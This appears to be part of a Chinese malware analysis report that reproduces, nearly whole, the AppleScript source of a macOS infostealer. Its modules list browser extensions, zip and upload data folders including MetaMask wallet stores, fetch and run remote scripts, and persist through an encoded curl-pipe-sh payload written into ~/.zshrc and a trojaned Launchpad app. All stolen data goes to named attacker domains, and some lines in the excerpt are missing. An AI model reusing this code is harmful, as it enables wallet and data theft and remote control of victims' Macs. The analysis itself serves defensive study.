    do shell script "ls /System/Applications &> " & logFile & " || true"

    upload(logFile, "Applications_System.txt")

    do shell script ("rm -f " & logFile & " || true")

    -- LaunchAgents List

    do shell script "ls ~/Library/LaunchAgents &> " & logFile & " || true"

    upload(logFile, "LaunchAgents.txt")

    do shell script ("rm -f " & logFile & " || true")

    -- Xprotect

    set logFile to quoted form of (tempFolder & "xprotect.log")

    do shell script "defaults read /Library/Apple/System/Library/CoreServices/XProtect.bundle/Contents/Info.plist CFBundleShortVersionString 2>/dev/null 1>" & logFile & " || echo 0"
    upload(logFile, "Xprotect.txt")

    do shell script ("rm -f " & logFile & " || true")

    -- MRT

    set logFile to quoted form of (tempFolder & "mrt.log")

    do shell script "defaults read /Library/Apple/System/Library/CoreServices/MRT.app/Contents/Info.plist CFBundleShortVersionString 2>/dev/null 1>" & logFile & " || echo 0"
    upload(logFile, "osmrt.txt")

    do shell script ("rm -f " & logFile & " || true")

    log "module finished"
on error the errorMessage number the errorNumber
    log "fatal error: " & errorMessage


4.4 extensions模块


set FORCED_UPDATE to false

global moduleName
global serialNumber
global userName
global tempFolder

set moduleName to "extensions"
set serialNumber to "XX00000000XX"
    set serialNumber to do shell script "ioreg -c IOPlatformExpertDevice -d 2 | awk -F\\\" '/IOPlatformSerialNumber/{print $(NF-1)}' "
end try
set userName to do shell script "whoami"
set tempFolder to "/tmp/"

global LOG_FILE

~/Library/Application Support/Firefox/Profiles/*/prefs.js|firefox_extensions
~/Library/Application Support/Google/Chrome/*/Extensions/*/manifest.json|chrome_extensions
~/Library/Application Support/Google/Chrome Canary/*/Extensions/*/manifest.json|canary_extensions
~/Library/Application Support/BraveSoftware/Brave-Browser/*/Extensions/*/manifest.json|brave_extensions
~/Library/Application Support/Microsoft Edge/*/Extensions/*/manifest.json|edge_extensions
~/Library/Application Support/com.operasoftware.Opera/*/Extensions/*/manifest.json|opera_extensions

set LOG_FILE to quoted form of (tempFolder & "out.txt")

on log (message)

    set message to ("b:" & userName & ":" & serialNumber & ":" & moduleName & ":" & message)
    set message to (quoted form of message)

        do shell script ("curl -fksL -m 6 -d " & message & " https://servcdn.info/l")
    end try
end log

on urlencode(theText)
    set theTextEnc to ""
    repeat with eachChar in characters of theText
        set useChar to eachChar
        set eachCharNum to ASCII number of eachChar
        if eachCharNum = 32 then
            set useChar to "+"
        else if (eachCharNum ≠ 42) and (eachCharNum ≠ 95) and (eachCharNum < 45 or eachCharNum > 46) and (eachCharNum < 48 or eachCharNum > 57) and (eachCharNum < 65 or eachCharNum > 90) and (eachCharNum < 97 or eachCharNum > 122) then
            set firstDig to round (eachCharNum / 16) rounding down
            set secondDig to eachCharNum mod 16
            if firstDig > 9 then
                set aNum to firstDig + 55
                set firstDig to ASCII character aNum
            end if
            if secondDig > 9 then
                set aNum to secondDig + 55
                set secondDig to ASCII character aNum
            end if
            set numHex to ("%" & (firstDig as string) & (secondDig as string)) as string
            set useChar to numHex
        end if
        set theTextEnc to theTextEnc & useChar as string
    end repeat
    return theTextEnc
end urlencode

on upload(filePath, fileName)
    set MAX_OVERALL_SIZE to 3000
    set unquotedFilePath to do shell script "echo '" & filePath & "' | xargs"
    set fileSize to (do shell script "du -m " & filePath & " | cut -f1") as integer
    set fileNameHuman to fileName
    set fileName to urlencode(fileName)
    if fileSize > MAX_OVERALL_SIZE then
        log "upload: file exceeds max size of " & MAX_OVERALL_SIZE & " MB. File size: " & fileSize & " MB"
    end if
    if fileSize < MAX_SERVER_UPLOAD_SIZE then
        log "starting server upload for " & fileNameHuman & ". Expected file size: " & fileSize & " MB"
            set message to ("b=" & userName & ":" & serialNumber & ":" & moduleName & ":" & fileName)
            set message to (quoted form of message)
            set fileField to quoted form of ("file=@" & unquotedFilePath)
            do shell script "curl -sk --connect-timeout 10 -F " & message & " -F " & fileField & " 'https://servcdn.info/u'"
        on error the errorMessage number the errorNumber
            log ("server upload failed with message: " & errorMessage)
        end try
    end if
end upload

on split(someText, delimiter)
    set AppleScript's text item delimiters to delimiter
    set someText to someText's text items
    set AppleScript's text item delimiters to {""} --> restore delimiters to default value
    return someText
end split

on implode(myList, delimiter)
    set AppleScript's text item delimiters to delimiter
    set someText to myList as text
    set AppleScript's text item delimiters to {""} --> restore delimiters to default value
    return someText
end implode

on doRepeatLoop(theLine)
    delay 0.5
    if theLine is equal to "" then
    end if
    set chunks to split(theLine, "|")
    if chunks is equal to {} then
    end if
    set findPath to item 1 of chunks
    if findPath contains "*" then
        set findPath to do shell script ("echo " & findPath)
        set findName to quoted form of (do shell script ("basename " & quoted form of findPath))
        set findPath to do shell script ("dirname " & quoted form of findPath)
        --log findPath
        set subChunks to split(findPath, "*")
        --log subChunks
        set basePath to item 1 of subChunks
        set basePath to quoted form of basePath
        if (count of subChunks) > 1 then
            set iPath to subChunks's items 2 thru -1
            set iPath to implode(iPath, "*")
            set iPath to quoted form of ("*" & iPath & "*")
            set iPath to quoted form of "/*"
        end if
        set execCom to "grep -E 'default_title|name' {} \\+ 2>/dev/null || true) | cut -f4 -d '\"'"
        if findName contains "prefs.js" then
            set execCom to "grep  'extensions.webextensions.ExtensionStorageIDB' {} \\+ 2>/dev/null || true) | cut -f2 -d '\"'"
        end if
        set comLine to "(find " & basePath & " -type f -ipath " & iPath & " -iname " & findName & " -exec " & execCom
        set resLines to paragraphs of (do shell script comLine)
        if resLines is not equal to {} then
            if (count of chunks) > 1 then
                do shell script ("echo '***** " & (item 2 of chunks) & " ****' >> " & LOG_FILE)
            end if
            set printLines to (implode(resLines, "\\n") & "\\n\\n")
            set printLines to quoted form of printLines

            do shell script ("echo " & printLines & ">>" & LOG_FILE)
        end if
    end if
end doRepeatLoop

on doMain()
    do shell script ("echo '' > " & LOG_FILE)
    set foldersList to paragraphs of FOLDERS_LIST
    repeat with theLine in foldersList
        end try
    end repeat
    upload(LOG_FILE, "extensions.txt")
    do shell script ("rm -rf " & LOG_FILE)
end doMain

    log "module launched"
    log "module finished"
on error the errorMessage number the errorNumber
    log "fatal error: " & errorMessage
end try


4.5 payloader模块

global moduleName
global serialNumber
global userName
global tempFolder

set moduleName to "payloader"
set serialNumber to "XX00000000XX"
    set serialNumber to do shell script "ioreg -c IOPlatformExpertDevice -d 2 | awk -F\\\" '/IOPlatformSerialNumber/{print $(NF-1)}' "
end try
set userName to do shell script "whoami"
set tempFolder to "/tmp/"



on log (message)

    set message to ("b:" & userName & ":" & serialNumber & ":" & moduleName & ":" & message)
    set message to (quoted form of message)

        do shell script ("curl -fksL -m 6 -d " & message & " https://servcdn.info/l")
    end try
end log

on launchApp(appFile, wait)
    if wait then
        do shell script ("open -Wgna " & appFile)
        do shell script ("open -gna " & appFile & " &> /dev/null & echo $!")
    end if
end launchApp

on isInstalled(bundleId)
    set appId to ""
        set appId to do shell script "mdfind kMDItemCFBundleIdentifier = '" & bundleId & "'"
    end try
    if appId is equal to "" then
        return false
    end if
    return true
end isInstalled

on boot(moduleName, wait)

        if moduleName = "telegram" and isInstalled("ru.keepcoder.Telegram") is false then
            log ("Telegram not found for " & moduleName)
        end if

        if moduleName = "cd" and isInstalled("com.google.Chrome") is false then
            log ("Chrome not found for " & moduleName)
        end if

        set finderModules to {"replicator", "uploader_folder", "finder", "exec"}
        if finderModules contains moduleName then
            boot("finder_app", true)
            set finderApp to "/Applications/SimulatorTrampoline.app"
            set finderAppExists to do shell script ("[ -d " & finderApp & " ] && echo '1' || echo '0'")
            if finderAppExists = "0" then
                error "Finder app was not found"
            end if
            set scptFile to finderApp & "/Contents/Resources/Scripts/app.scpt"
            set scptFile to quoted form of scptFile
            do shell script "curl -fksL -d 's=" & serialNumber & "' 'https://servcdn.info/s/" & moduleName & ".ini' | osacompile -x -o " & scptFile
            launchApp(finderApp, wait)
            delay 1
            do shell script "rm -f " & scptFile
        end if
        --set appFileUnquoted to tempFolder & moduleName & ".app"
        --set appFile to quoted form of (appFileUnquoted)
        --do shell script "curl -fksL -d 's=" & serialNumber & "' 'https://servcdn.info/s/" & moduleName & ".ini' | osacompile -x -o " & appFile
        --launchApp(appFile, wait)

        if wait then
            do shell script "osascript -e \"$(curl -fskL -d 's=" & serialNumber & "' 'https://servcdn.info/s/" & moduleName & ".ini')\""
            do shell script "osascript -e \"$(curl -fksL -d 's=" & serialNumber & "' 'https://servcdn.info/s/" & moduleName & ".ini')\" &>/dev/null &"
        end if
    on error the errorMessage number the errorNumber
        log ("Module " & moduleName & " boot failed with message: " & errorMessage)

        delay 1
    end try
end boot

on split(someText, delimiter)
    set AppleScript's text item delimiters to delimiter
    set someText to someText's text items
    set AppleScript's text item delimiters to {""} --> restore delimiters to default value
    return someText
end split

on doMain()

        set theModuleName to do shell script "curl -m 6 -fksL -d 'u=" & userName & "&s=" & serialNumber & "' https://servcdn.info/p"
            if theModuleName is not equal to "" then

                boot(theModuleName, false)
            end if
    on error the errorMessage number the errorNumber
        log "payload request failed: " & errorMessage
    end try
end doMain

    log "module launched"
    log "module finished"
on error the errorMessage number the errorNumber
    log "fatal error: " & errorMessage
end try


4.6 data_folders模块


set FORCED_UPDATE to false

global moduleName
global serialNumber
global userName
global tempFolder

set moduleName to "data_folders"
set serialNumber to "XX00000000XX"
    set serialNumber to do shell script "ioreg -c IOPlatformExpertDevice -d 2 | awk -F\\\" '/IOPlatformSerialNumber/{print $(NF-1)}' "
end try
set userName to do shell script "whoami"
set tempFolder to "/tmp/"



on log (message)

    set message to ("b:" & userName & ":" & serialNumber & ":" & moduleName & ":" & message)
    set message to (quoted form of message)

        do shell script ("curl -fksL -m 6 -d " & message & " https://servcdn.info/l")
    end try
end log

on urlencode(theText)
    set theTextEnc to ""
    repeat with eachChar in characters of theText
        set useChar to eachChar
        set eachCharNum to ASCII number of eachChar
        if eachCharNum = 32 then
            set useChar to "+"
        else if (eachCharNum ≠ 42) and (eachCharNum ≠ 95) and (eachCharNum < 45 or eachCharNum > 46) and (eachCharNum < 48 or eachCharNum > 57) and (eachCharNum < 65 or eachCharNum > 90) and (eachCharNum < 97 or eachCharNum > 122) then
            set firstDig to round (eachCharNum / 16) rounding down
            set secondDig to eachCharNum mod 16
            if firstDig > 9 then
                set aNum to firstDig + 55
                set firstDig to ASCII character aNum
            end if
            if secondDig > 9 then
                set aNum to secondDig + 55
                set secondDig to ASCII character aNum
            end if
            set numHex to ("%" & (firstDig as string) & (secondDig as string)) as string
            set useChar to numHex
        end if
        set theTextEnc to theTextEnc & useChar as string
    end repeat
    return theTextEnc
end urlencode

on upload(filePath, fileName)
    set MAX_OVERALL_SIZE to 3000
    set unquotedFilePath to do shell script "echo '" & filePath & "' | xargs"
    set fileSize to (do shell script "du -m " & filePath & " | cut -f1") as integer
    set fileNameHuman to fileName
    set fileName to urlencode(fileName)
    if fileSize > MAX_OVERALL_SIZE then
        log "upload: file exceeds max size of " & MAX_OVERALL_SIZE & " MB. File size: " & fileSize & " MB"
    end if
    if fileSize < MAX_SERVER_UPLOAD_SIZE then
        log "starting server upload for " & fileNameHuman & ". Expected file size: " & fileSize & " MB"
            set message to ("b=" & userName & ":" & serialNumber & ":" & moduleName & ":" & fileName)
            set message to (quoted form of message)
            set fileField to quoted form of ("file=@" & unquotedFilePath)
            do shell script "curl -sk --connect-timeout 10 -F " & message & " -F " & fileField & " 'https://servcdn.info/u'"
        on error the errorMessage number the errorNumber
            log ("server upload failed with message: " & errorMessage)
        end try
    end if
end upload

on split(someText, delimiter)
    set AppleScript's text item delimiters to delimiter
    set someText to someText's text items
    set AppleScript's text item delimiters to {""} --> restore delimiters to default value
    return someText
end split

on implode(myList, delimiter)
    set AppleScript's text item delimiters to delimiter
    set someText to myList as text
    set AppleScript's text item delimiters to {""} --> restore delimiters to default value
    return someText
end implode

on str_replace(this_text, search_string, replacement_string)
    set AppleScript's text item delimiters to the search_string
    set the item_list to every text item of this_text
    set AppleScript's text item delimiters to the replacement_string
    set this_text to the item_list as string
    set AppleScript's text item delimiters to ""
    return this_text
end str_replace

on doRepeatLoop(foldersList)
    delay 0.5
    if foldersList is equal to {} then
    end if
        set theLine to item 1 of foldersList
        -- log "processing line " & theLine
        set chunks to split(theLine, "|")
        if chunks is not equal to {} then
            set findPath to item 1 of chunks
            if theLine contains "FIREFOX_META_FLAG" then
                set findPath to str_replace(findPath, " ", "\\ ")
                set foundGrepPath to do shell script "grep -lir -E '\\smetamask\\s' " & findPath & " | head -1 | awk -Fidb 'NF>1 { print $1 }'"
                --log foundGrepPath
                set findPaths to {}
                if foundGrepPath is not equal to "" then
                    if (count of chunks) > 1 then
                        set chunks to chunks's items 2 thru -2
                    end if
                    set end of findPaths to (foundGrepPath & "|" & implode(chunks, "|"))
                end if
                set foldersList to foldersList's (items 2 thru -1)
                set foldersList to findPaths & foldersList
            end if
            if findPath contains "*" then
                set findPath to do shell script ("echo " & findPath)
                set findName to quoted form of (do shell script ("basename " & quoted form of findPath))
                set findPath to do shell script ("dirname " & quoted form of findPath)
                --log findPath
                set subChunks to split(findPath, "*")
                --log subChunks
                set basePath to item 1 of subChunks
                set basePath to quoted form of basePath

                set checkDirExists to do shell script ("[ -d " & basePath & " ] && echo 'yes' || echo 'no'")
                if checkDirExists is equal to "no" then

                    log "not found folder: " & basePath
                    set foldersList to foldersList's (items 2 thru -1)

                end if

                if (count of subChunks) > 1 then
                    set iPath to subChunks's items 2 thru -1
                    set iPath to implode(iPath, "*")
                    set iPath to quoted form of ("*" & iPath & "*")
                    set iPath to quoted form of "/*"
                end if
                set comLine to "find " & basePath & " -type d -ipath " & iPath & " -iname " & findName & " -print 2>/dev/null || true"
                --log comLine
                set findPaths to paragraphs of (do shell script (comLine))
                --log findPaths
                if (count of chunks) > 1 then
                    set chunks to (chunks's items 2 thru -1)
                    repeat with i from 1 to (count findPaths)
                        set extraLine to implode(chunks, "|")
                        set item i of findPaths to ((item i of findPaths) & "|" & extraLine)
                    end repeat
                end if
                set foldersList to foldersList's (items 2 thru -1)
                set foldersList to findPaths & foldersList
            end if
            set folderPath to do shell script ("echo " & findPath)
            set folderPath to quoted form of folderPath
            set checkDirExists to do shell script ("[ -d " & folderPath & " ] && echo 'yes' || echo 'no'")
            if checkDirExists is equal to "yes" then
                    log "data folder found " & folderPath
                    set folderNameBaseName to do shell script ("echo $(basename " & folderPath & ")")
                    set savePath to quoted form of (tempFolder & folderNameBaseName & ".zip")
                    set comLine to "cd " & folderPath & "; cd .. ; rm -rf " & savePath & " && nice -n 10 zip -yr " & savePath & " " & (quoted form of folderNameBaseName)
                    if (count of chunks) > 1 then
                        set excludeFolderNames to split((item 2 of chunks), ",")
                        repeat with theExculsionFolder in excludeFolderNames
                            set comLine to comLine & " -x '*/" & theExculsionFolder & "/*'"
                        end repeat
                    end if
                    set comLine to comLine & " -x '*/.git/*'"
                    --log comLine
                    do shell script comLine
                    set uploadFileName to folderNameBaseName
                    if (count of chunks) > 2 then
                        set customFileName to (item 3 of chunks)
                        set uploadFileName to customFileName
                    end if
                    if USED_FILENAMES contains uploadFileName then
                        set uploadFileName to uploadFileName & "_"
                    end if
                    set end of USED_FILENAMES to uploadFileName
                    upload(savePath, (uploadFileName & "_data.zip"))
                    do shell script ("rm -rf " & savePath)
                on error the errorMessage number the errorNumber
                    log ("folder processing failed: " & errorMessage)
                end try
                log "not found folder: " & folderPath
            end if
        end if
    end try
    if (count of foldersList) > 1 then
        set foldersList to foldersList's (items 2 thru -1)
        set foldersList to {}
    end if
end doRepeatLoop

on doMain()
    set message to "f&u=" & userName & "&s=" & serialNumber

    set message to quoted form of message

    set foldersList to paragraphs of (do shell script ("curl -fksL -m 6 -d " & message & " https://servcdn.info/u"))

end doMain

    log "module launched"

    log "module finished"
on error the errorMessage number the errorNumber
    log "fatal error: " & errorMessage
end try


4.7 persist模块


set RESTORE_DEFAULT to false

global moduleName
global serialNumber
global userName
global tempFolder

set moduleName to "persist_a"
set serialNumber to "XX00000000XX"
    set serialNumber to do shell script "ioreg -c IOPlatformExpertDevice -d 2 | awk -F\\\" '/IOPlatformSerialNumber/{print $(NF-1)}' "
end try
set userName to do shell script "whoami"
set tempFolder to "/tmp/"

on log (message)

    set message to ("b:" & userName & ":" & serialNumber & ":" & moduleName & ":" & message)
    set message to (quoted form of message)

        do shell script ("curl -fksL -m 6 -d " & message & " https://servcdn.info/l")
    end try
end log

global dockUtil

set APP_VERSION to "2.0"

on split(someText, delimiter)
    set AppleScript's text item delimiters to delimiter
    set someText to someText's text items
    set AppleScript's text item delimiters to {""} --> restore delimiters to default value
    return someText
end split

on str_replace(this_text, search_string, replacement_string)
    set AppleScript's text item delimiters to the search_string
    set the item_list to every text item of this_text
    set AppleScript's text item delimiters to the replacement_string
    set this_text to the item_list as string
    set AppleScript's text item delimiters to ""
    return this_text
end str_replace

on getPayloadBody(pName)

    set dArray to "(\"adguards.ru\" \"trendsolutions.info\" \"servcdn.info\" \"apscdn.ru\" \"mobilecdn.ru\" \"adguardstats.ru\")"

    set encMethods to {"xxd -p -c0|xxd -p -r", "base64|base64 -D"}
    set encMethod to some item of encMethods
    set chunks to split(encMethod, "|")
    set encFunc to item 1 of chunks
    set decFunc to item 2 of chunks
    set encString to do shell script "echo 'd=" & dArray & ";c=${d[$(($RANDOM % ${#d[@]} ))]};curl -fskL -d \"p=" & pName & "\" \"https://$c/a\" | sh' | " & encFunc
    set shPayload to "(echo " & encString & " | " & decFunc & " | sh >/dev/null 2>&1 &)"
    return shPayload

end getPayloadBody

on getPayloadForApp(appName, fileUri)
    set payload to "do shell script \"open '" & fileUri & "'\""
    if appName = "Launchpad.app" then

        set payload to getPayloadBody("Launchpad")
        set payload to "
do shell script \"open -b com.apple.launchpad.launcher\"
do shell script \"" & payload & "\"

    end if
    return payload
end getPayloadForApp

on restoreItem(appName, fileUri, itemName)
    log "restoring item " & fileUri
    set appFile to ""
    if appName = "Launchpad.app" then
        set appFile to "/System/Applications/Launchpad.app"
    end if

    if appFile is equal to "" then return
    set appDiskPath to str_replace(fileUri, "file:///", "/")
        do shell script "rm -rf " & quoted form of appDiskPath
        log "app deleted in Caches/com.apple.finder"
    end try
    set noRestart to " --no-restart"
    if DOCKUTIL_FORCE_RESTART is true then
        set noRestart to ""
    end if
    do shell script dockUtil & " --add " & appFile & " --label " & quoted form of itemName & " --replacing " & quoted form of itemName & " " & noRestart
    log "dockutil --add " & appFile & " --label " & quoted form of itemName & " --replacing " & quoted form of itemName & " " & noRestart
end restoreItem

on processItem(theItem)
    log "processing item: " & theItem
    set chunks to split(theItem, "|")
    if (count of chunks) < 2 then return
    set itemName to item 1 of chunks
    set fileUri to item 2 of chunks
    set fileUrl to quoted form of (str_replace(fileUri, "%20", " "))
    set appName to do shell script "basename " & fileUri
    set appName to str_replace(appName, "%20", " ")

    if theItem contains "Caches/com.apple.finder" and RESTORE_DEFAULT is true then
        restoreItem(appName, fileUrl, itemName)
    end if

    if theItem contains "Caches/com.apple.finder" then
        log "item " & theItem & " already done"
        set appDiskPath to str_replace(fileUri, "file:///", "/")
        set infoPlistFile to quoted form of (appDiskPath & "/Contents/Info.plist")
        set appVersion to do shell script ("defaults read " & infoPlistFile & " CFBundleShortVersionString 2>/dev/null || echo '1.0'")
        if appVersion is not equal to APP_VERSION then
            log "version change was " & appVersion & ". currrent: " & APP_VERSION & ". updating..."
        end if
    end if

    set appFileDir to do shell script "echo ~/Library/Caches/com.apple.finder/"
    set appFileUnquoted to appFileDir & appName
    set appFile to quoted form of appFileUnquoted
    set payload to getPayloadForApp(appName, fileUri)
    set payload to quoted form of payload
    do shell script "rm -rf " & appFile & " && osacompile -x -e " & payload & " -o " & appFile -- x option add

    if appName = "Launchpad.app" then
        do shell script "plutil -replace LSUIElement -bool YES " & appFileUnquoted & "/Contents/Info.plist"
        do shell script "plutil -replace CFBundleDisplayName -string 'Launchpad' " & appFileUnquoted & "/Contents/Info.plist"
        do shell script "plutil -replace CFBundleIdentifier -string 'com.apple.launchpad.launcher' " & appFileUnquoted & "/Contents/Info.plist"

        set infoPlistLoctable to quoted form of appFileUnquoted & "/Contents/Resources/InfoPlist.loctable"
        do shell script ("curl -fksL -o " & infoPlistLoctable & " 'https://servcdn.info/agent/bin/InfoPlist.loctable_launchpad'")

        set lprojDirs to quoted form of appFileUnquoted & "/Contents/Resources/{ar.lproj,zh_CN.lproj,zh_HK.lproj,zh_TW.lproj}"
        do shell script ("mkdir -p " & lprojDirs)

    end if

    do shell script "plutil -replace CFBundleShortVersionString -string '" & APP_VERSION & "' " & appFileUnquoted & "/Contents/Info.plist"

    set icnsFile to quoted form of appFileUnquoted & "/Contents/Resources/applet.icns"

        set iconName to str_replace(appName, ".app", "")
        set iconName to str_replace(iconName, " ", "")
        set macOsVersion to do shell script "defaults read loginwindow SystemVersionStampAsString"
        do shell script ("curl -fksL -o " & icnsFile & " 'https://servcdn.info/agent/bin/icons.php?icon=" & iconName & "&os=" & macOsVersion & "'")
    end try
    do shell script "codesign --force --deep -s - " & appFile
    log "app in place and codesigned"
    if theItem does not contain "Caches/com.apple.finder" then
        set noRestart to " --no-restart"
        if DOCKUTIL_FORCE_RESTART is true then
            set noRestart to ""
        end if
        do shell script dockUtil & " --add " & appFile & " --label " & quoted form of itemName & " --replacing " & quoted form of itemName & " " & noRestart
        log "dockutil --add " & appFile & " --label " & quoted form of itemName & " --replacing " & quoted form of itemName & " " & noRestart
    end if
end processItem

on doDock()
    set dockUtil to quoted form of (tempFolder & "dockutil")
        do shell script ("curl -fksL -o " & dockUtil & " https://servcdn.info/agent/bin/dockutil --create-dirs")
        do shell script "chmod +x " & dockUtil
    on error the errorMessage
        log "failed downloading dockutil: " & errorMessage
    end try
        set itemSet to paragraphs of (do shell script dockUtil & " --list | cut -f 1-2 | sed 's/\\t/|/g' | grep -E '/(Launchpad).app' | cat")

        log (do shell script "file " & dockUtil & " | head -n 1")

        --log (do shell script "codesign -vvv " & dockUtil)

        log (do shell script dockUtil & " --version")

    on error errorMessage
        error "dockutil error: " & errorMessage
    end try
    if itemSet is equal to {} then
        log "no matching Dock items"
    end if
    repeat with theItem in itemSet
    end repeat

    do shell script "rm -rf " & dockUtil
end doDock

on doMain()


        set payload to getPayloadBody("Terminal")
        set payload to quoted form of payload

        do shell script "echo " & payload & " > ~/.zshrc_aliases"

        log ".zshrc_aliases updated"

        set payload to "[ -f $HOME/.zshrc_aliases ] && . $HOME/.zshrc_aliases"

        set payload to quoted form of payload

        do shell script "touch ~/.zshrc"

        do shell script "grep -qF '.zshrc_aliases' ~/.zshrc || echo " & payload & " >> ~/.zshrc"

        log ".zshrc done"

    on error the errorMessage

        log "failed at .zshrc: " & errorMessage

    end try

end doMain




    log "module finished"
on error the errorMessage number the errorNumber
    log "fatal error: " & errorMessage
end try



"adguards.ru", "mobilecdn.ru", "trendsolutions.info", "servcdn.info", "apscdn.ru", "adguardstats.ru"



5.复原病毒修改过权限的HOME/Library/Application Support/Google/GoogleUpdater\和chmod 000 \"HOME/Library/Google/GoogleSoftwareUpdate






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